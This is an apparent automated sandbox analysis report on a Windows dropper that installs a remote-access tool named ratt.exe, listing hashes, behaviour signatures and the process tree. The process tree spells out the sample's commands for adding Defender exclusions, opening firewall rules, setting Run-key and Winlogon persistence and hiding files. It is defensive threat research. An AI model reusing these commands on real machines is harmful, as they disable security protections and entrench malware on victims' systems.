Analysis
-
max time kernel
62s -
max time network
131s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
03/08/2023, 08:00
Static task
static1
General
-
Target
ddf0b2df3ccbdee8cd2ce5cb4f13cf38ea8bc3bf90232884ed30a41c6f095df1.exe
-
Size
1.4MB
-
MD5
5ab468dc891478439370a2498cc5792a
-
SHA1
f39056fd06fb98ecc2aec92338f5565fef9679fc
-
SHA256
ddf0b2df3ccbdee8cd2ce5cb4f13cf38ea8bc3bf90232884ed30a41c6f095df1
-
SHA512
2824bc2e5473588a5fe70027c76a664a0d814e45cbbe63c6986936c29752ea7dbb65d2f013db1c1827881a62a7a48308cef67009fc8f68c9f340094096caf629
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 3724 netsh.exe 2400 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000700000001b017-254.dat acprotect behavioral1/files/0x000700000001b017-255.dat acprotect -
Executes dropped EXE 2 IoCs
pid Process 4908 7z.exe 4740 ratt.exe -
Loads dropped DLL 1 IoCs
pid Process 4908 7z.exe -
resource yara_rule behavioral1/files/0x000700000001b01b-251.dat upx behavioral1/memory/4908-252-0x0000000000400000-0x0000000000432000-memory.dmp upx behavioral1/files/0x000700000001b01b-253.dat upx behavioral1/files/0x000700000001b017-254.dat upx behavioral1/files/0x000700000001b017-255.dat upx behavioral1/memory/4908-256-0x0000000010000000-0x00000000100E2000-memory.dmp upx behavioral1/memory/4908-260-0x0000000000400000-0x0000000000432000-memory.dmp upx -
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 208.67.222.222 Destination IP 208.67.222.222 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 4 IoCs
pid Process 312 PING.EXE 4052 PING.EXE 4468 PING.EXE 2716 PING.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 3704 powershell.exe 3704 powershell.exe 3704 powershell.exe 4816 powershell.exe 4816 powershell.exe 4816 powershell.exe 308 powershell.exe 308 powershell.exe 308 powershell.exe 3676 powershell.exe 3676 powershell.exe 3676 powershell.exe 4684 powershell.exe 4684 powershell.exe 4684 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 4740 ratt.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 5036 WMIC.exe Token: SeSecurityPrivilege 5036 WMIC.exe Token: SeTakeOwnershipPrivilege 5036 WMIC.exe Token: SeLoadDriverPrivilege 5036 WMIC.exe Token: SeSystemProfilePrivilege 5036 WMIC.exe Token: SeSystemtimePrivilege 5036 WMIC.exe Token: SeProfSingleProcessPrivilege 5036 WMIC.exe Token: SeIncBasePriorityPrivilege 5036 WMIC.exe Token: SeCreatePagefilePrivilege 5036 WMIC.exe Token: SeBackupPrivilege 5036 WMIC.exe Token: SeRestorePrivilege 5036 WMIC.exe Token: SeShutdownPrivilege 5036 WMIC.exe Token: SeDebugPrivilege 5036 WMIC.exe Token: SeSystemEnvironmentPrivilege 5036 WMIC.exe Token: SeRemoteShutdownPrivilege 5036 WMIC.exe Token: SeUndockPrivilege 5036 WMIC.exe Token: SeManageVolumePrivilege 5036 WMIC.exe Token: 33 5036 WMIC.exe Token: 34 5036 WMIC.exe Token: 35 5036 WMIC.exe Token: 36 5036 WMIC.exe Token: SeIncreaseQuotaPrivilege 5036 WMIC.exe Token: SeSecurityPrivilege 5036 WMIC.exe Token: SeTakeOwnershipPrivilege 5036 WMIC.exe Token: SeLoadDriverPrivilege 5036 WMIC.exe Token: SeSystemProfilePrivilege 5036 WMIC.exe Token: SeSystemtimePrivilege 5036 WMIC.exe Token: SeProfSingleProcessPrivilege 5036 WMIC.exe Token: SeIncBasePriorityPrivilege 5036 WMIC.exe Token: SeCreatePagefilePrivilege 5036 WMIC.exe Token: SeBackupPrivilege 5036 WMIC.exe Token: SeRestorePrivilege 5036 WMIC.exe Token: SeShutdownPrivilege 5036 WMIC.exe Token: SeDebugPrivilege 5036 WMIC.exe Token: SeSystemEnvironmentPrivilege 5036 WMIC.exe Token: SeRemoteShutdownPrivilege 5036 WMIC.exe Token: SeUndockPrivilege 5036 WMIC.exe Token: SeManageVolumePrivilege 5036 WMIC.exe Token: 33 5036 WMIC.exe Token: 34 5036 WMIC.exe Token: 35 5036 WMIC.exe Token: 36 5036 WMIC.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 308 powershell.exe Token: SeDebugPrivilege 3676 powershell.exe Token: SeDebugPrivilege 4684 powershell.exe Token: SeDebugPrivilege 4696 powershell.exe Token: SeIncreaseQuotaPrivilege 4736 WMIC.exe Token: SeSecurityPrivilege 4736 WMIC.exe Token: SeTakeOwnershipPrivilege 4736 WMIC.exe Token: SeLoadDriverPrivilege 4736 WMIC.exe Token: SeSystemProfilePrivilege 4736 WMIC.exe Token: SeSystemtimePrivilege 4736 WMIC.exe Token: SeProfSingleProcessPrivilege 4736 WMIC.exe Token: SeIncBasePriorityPrivilege 4736 WMIC.exe Token: SeCreatePagefilePrivilege 4736 WMIC.exe Token: SeBackupPrivilege 4736 WMIC.exe Token: SeRestorePrivilege 4736 WMIC.exe Token: SeShutdownPrivilege 4736 WMIC.exe Token: SeDebugPrivilege 4736 WMIC.exe Token: SeSystemEnvironmentPrivilege 4736 WMIC.exe Token: SeRemoteShutdownPrivilege 4736 WMIC.exe Token: SeUndockPrivilege 4736 WMIC.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 3996 wrote to memory of 2020 3996 ddf0b2df3ccbdee8cd2ce5cb4f13cf38ea8bc3bf90232884ed30a41c6f095df1.exe 70 PID 3996 wrote to memory of 2020 3996 ddf0b2df3ccbdee8cd2ce5cb4f13cf38ea8bc3bf90232884ed30a41c6f095df1.exe 70 PID 3996 wrote to memory of 2020 3996 ddf0b2df3ccbdee8cd2ce5cb4f13cf38ea8bc3bf90232884ed30a41c6f095df1.exe 70 PID 2020 wrote to memory of 4112 2020 cmd.exe 73 PID 2020 wrote to memory of 4112 2020 cmd.exe 73 PID 2020 wrote to memory of 4112 2020 cmd.exe 73 PID 4112 wrote to memory of 2284 4112 cmd.exe 74 PID 4112 wrote to memory of 2284 4112 cmd.exe 74 PID 4112 wrote to memory of 2284 4112 cmd.exe 74 PID 2020 wrote to memory of 2716 2020 cmd.exe 75 PID 2020 wrote to memory of 2716 2020 cmd.exe 75 PID 2020 wrote to memory of 2716 2020 cmd.exe 75 PID 2716 wrote to memory of 5036 2716 cmd.exe 76 PID 2716 wrote to memory of 5036 2716 cmd.exe 76 PID 2716 wrote to memory of 5036 2716 cmd.exe 76 PID 2020 wrote to memory of 3704 2020 cmd.exe 78 PID 2020 wrote to memory of 3704 2020 cmd.exe 78 PID 2020 wrote to memory of 3704 2020 cmd.exe 78 PID 2020 wrote to memory of 4816 2020 cmd.exe 79 PID 2020 wrote to memory of 4816 2020 cmd.exe 79 PID 2020 wrote to memory of 4816 2020 cmd.exe 79 PID 2020 wrote to memory of 308 2020 cmd.exe 80 PID 2020 wrote to memory of 308 2020 cmd.exe 80 PID 2020 wrote to memory of 308 2020 cmd.exe 80 PID 2020 wrote to memory of 3676 2020 cmd.exe 81 PID 2020 wrote to memory of 3676 2020 cmd.exe 81 PID 2020 wrote to memory of 3676 2020 cmd.exe 81 PID 2020 wrote to memory of 4684 2020 cmd.exe 82 PID 2020 wrote to memory of 4684 2020 cmd.exe 82 PID 2020 wrote to memory of 4684 2020 cmd.exe 82 PID 2020 wrote to memory of 4908 2020 cmd.exe 83 PID 2020 wrote to memory of 4908 2020 cmd.exe 83 PID 2020 wrote to memory of 4908 2020 cmd.exe 83 PID 2020 wrote to memory of 4696 2020 cmd.exe 84 PID 2020 wrote to memory of 4696 2020 cmd.exe 84 PID 2020 wrote to memory of 4696 2020 cmd.exe 84 PID 4696 wrote to memory of 3724 4696 powershell.exe 85 PID 4696 wrote to memory of 3724 4696 powershell.exe 85 PID 4696 wrote to memory of 3724 4696 powershell.exe 85 PID 4696 wrote to memory of 2400 4696 powershell.exe 86 PID 4696 wrote to memory of 2400 4696 powershell.exe 86 PID 4696 wrote to memory of 2400 4696 powershell.exe 86 PID 4696 wrote to memory of 3896 4696 powershell.exe 87 PID 4696 wrote to memory of 3896 4696 powershell.exe 87 PID 4696 wrote to memory of 3896 4696 powershell.exe 87 PID 3896 wrote to memory of 4736 3896 cmd.exe 88 PID 3896 wrote to memory of 4736 3896 cmd.exe 88 PID 3896 wrote to memory of 4736 3896 cmd.exe 88 PID 4696 wrote to memory of 4640 4696 powershell.exe 89 PID 4696 wrote to memory of 4640 4696 powershell.exe 89 PID 4696 wrote to memory of 4640 4696 powershell.exe 89 PID 4640 wrote to memory of 2164 4640 cmd.exe 90 PID 4640 wrote to memory of 2164 4640 cmd.exe 90 PID 4640 wrote to memory of 2164 4640 cmd.exe 90 PID 4696 wrote to memory of 4740 4696 powershell.exe 91 PID 4696 wrote to memory of 4740 4696 powershell.exe 91 PID 4696 wrote to memory of 4740 4696 powershell.exe 91 PID 4696 wrote to memory of 4384 4696 powershell.exe 92 PID 4696 wrote to memory of 4384 4696 powershell.exe 92 PID 4696 wrote to memory of 4384 4696 powershell.exe 92 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4384 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ddf0b2df3ccbdee8cd2ce5cb4f13cf38ea8bc3bf90232884ed30a41c6f095df1.exe"C:\Users\Admin\AppData\Local\Temp\ddf0b2df3ccbdee8cd2ce5cb4f13cf38ea8bc3bf90232884ed30a41c6f095df1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵PID:2284
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4908
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4696 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:3724
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:2400
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵PID:2164
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4740 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵PID:1156
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 96⤵
- Runs ping.exe
PID:312
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"6⤵PID:3396
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 9 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 9 > nul && "C:\Users\Admin\Music\rot.exe"5⤵PID:3800
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 96⤵
- Runs ping.exe
PID:4052
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Views/modifies file attributes
PID:4384
-
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵PID:4132
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 15 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 15 > nul && "C:\Users\Admin\Music\rot.exe"4⤵PID:4928
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 155⤵
- Runs ping.exe
PID:4468
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 155⤵
- Runs ping.exe
PID:2716
-
-
C:\Users\Admin\Music\rot.exe"C:\Users\Admin\Music\rot.exe"5⤵PID:3852
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵PID:4988
-
-
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵PID:4188
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
375.6MB
MD544055f68e58301e6d56ab6bcbaea6d79
SHA1f8c9c2da080b99ffe8d29a50dc919097b651cc38
SHA256fea662a4e8f285db3051b04cc1480894167ffcd4c83a6f73bbf42fd7a760e1a2
SHA512b359f980b2002f5400e7ad77c0494f582abd9d29e112142a621db4c5bca67915a059ac907f1a25adeb6f54d4d9b04815b4a0d2773d60bf234503977f5066cbf4
-
Filesize
270.2MB
MD57152e0ce6c6a80ac109b9c2c95e27510
SHA15cdc3363d0e168ee825a7a97fd1a0aae8b8ff744
SHA25602a2eb085e5132c2c4e775af084083855d685721cf2192c55c70a5071a8f1c24
SHA51292c59d96e3c7872acb7d973ba039f15e2e9e6d408c94960df3df09e1e91ab69c561b0a9fca9c0c1e4345cab7957a04b62b4380a2ae888ddc93b672bba974c964
-
Filesize
1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
Filesize
1KB
MD59e104e9aa0cfdec0753de24cbe3f587b
SHA1f63b8d0b29c65e518be6a9412e7499c9de11be78
SHA25659a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f
SHA5128253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b
-
Filesize
12KB
MD5361667abe9ccb285caad82777330046d
SHA1e97ab52ebb2fe2c57f6e1511a7e02508c2ab9572
SHA25620f75ae9887dd94c09efa97be8c39a22dda46f48a68130ed0196c216c75c5894
SHA5121a26a08f94ce481805de7efce7cf8941450c1ce60a2dd6a3a9629ccdd4e97ba70ce3ed38c2e8374f9e4d1355b49fc945af8d2b3ea060af0e2cdaaae69c61789c
-
Filesize
12KB
MD561d9d4f192d638da46b07b2c5eca11f2
SHA116798040fce0838ea802f6429fbe45a57e7e3945
SHA2567b338c6774d610798fe354c49e51bfcabf7bfff15d04a752e94a86272b54f4d2
SHA512843bd09f6dba02f28eff6265f4d64fd5c245456943677dd52b13327b900af9dadcc891facfc1f450dc57de07b2628acc94f78bab1ca0eebdef42baf31dd20dd4
-
Filesize
12KB
MD542a448a000ac79516f8d831280de262d
SHA1f671df645f77922e58abff3638674fbfbdda4202
SHA256b3049c79483311957df89de04e84d152b335bc6dc8f9b07c1b7a372eb255b52f
SHA5129b30b65086b22aa728e26a6c39ddaf180cdf13a45f55a7dcd640be60cd99cae6517671461427bb5d0a0227cac565fd3e710e962c8b16e3cd1334fea58016f5f3
-
Filesize
12KB
MD52b29af25353ff07dccab4a53fb68348d
SHA14cc135b8122e9f54698671ab6d66493a1493aab4
SHA256a155cc710d8144587f77fde2a82caf574a85afc584797b6bd9e2dd0962015600
SHA51236707ff10f992785ad30063ed59b84f94fd635ee5ba898fffdc6d02d56a6405d7928e109d1ff404b04c9ea7221efd78032c58b4ef854cb3d6681e9481842856e
-
Filesize
12KB
MD5ee038453d878ff6607237ff10c47f875
SHA1947ae20975241d1c7a96b15298587bd13931647b
SHA2567dfe5cf7382c83c9cb5506e7ebf9521f30ac94311bb1a3a47b8e583eef56614c
SHA51237b7e77ee0289dbb5f42d43a8cf52680e7dd7bfdc46612edf9b577cd408e7a1af422e939069fdc085942500503e4f79e5600ba6dd5c1562fdbe428ccafd46267
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
SHA51201ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
693KB
MD57de6fdf3629c73bf0c29a96fa23ae055
SHA1dcb37f6d43977601c6460b17387a89b9e4c0609a
SHA256069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
SHA512d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8
-
Filesize
1KB
MD57ea1fec84d76294d9256ae3dca7676b2
SHA11e335451d1cbb6951bc77bf75430f4d983491342
SHA2569a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
SHA512ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317
-
Filesize
648.8MB
MD59530945f7d0567d779e19bd876cbb05d
SHA112c6e2edf3e0f207cf29cb4b6ffa771be2188723
SHA256635167658ac63d172fa4de0bcd93ad25ffce913a71c204e46b2f91f3eca15080
SHA512b7bbecce4e02ac98b8013317462308a1a48fbc5836b553ad57aa948be1be2ac77511b2f0213ee726e92ceda9a34b2465261b78f8cd6fcdfe0a0250847287110f
-
Filesize
238.9MB
MD530ce2fea7de8cfaae90f4ed48d0687cc
SHA16449679c712ea22a68cc028822d7580af0a3081d
SHA256f7621a113c453c80ccf3c06b7c36772e568079b46af852dbed835528e60d5ae4
SHA51226af64052657a2616c92f5dcae244db9a8a040c19ad539cdc17d759e98040d4071df6b56177710c339083be854b8ee60f33573dbc3c179b5230d51df97bb21f9
-
Filesize
114.7MB
MD50a87b549ed3199c7adba1fae4e98e772
SHA1dbae9042a62cd97ee9b17669367cc6eda953afae
SHA256d7c2340f8dec4a89f2a56e5ea280857021d69e7a1dcc23c8f4efdbbf01554636
SHA5121603d443e6525074ee8a023203d992ad909106028f989c0481e42b1ee44f3ec4b077ee57920856e3591f47c34d550786bb7a47fa38c4f7bfea3da68349990940
-
Filesize
59.1MB
MD5f8a1612edef4a3514f67ae1dd6e99ae8
SHA16a6fa612d43e22da380cb99dcf63afe7004ce203
SHA2560813dabadd4a84e58a53567e16036b8310be1157e410f4878b7ce98ee48a7613
SHA5120ba864bf0dab058f99031078233a13338bf10eada01839483334ab6fb2777f73b9e01a2f413012ddd59c615e179f4a79bc3360b156f2961faa5c589dc6f0d5b4
-
Filesize
58.1MB
MD5c97c4955222b9ca25d6f5be9c022ceb4
SHA136810893690ca997c67ed4683605b328bdca65f3
SHA25699ffbb0f830df5618816afd3ce088b77f3185ce3240d230381207bb2552493d9
SHA51247a208250cc5db302c4d601015e940c0da8c161f50e7c9ccd435dafcb8e596a64a2fd298c4d76aefd8d713ffb3c018de16314e1ac4270c903147ab82d732ad8e
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287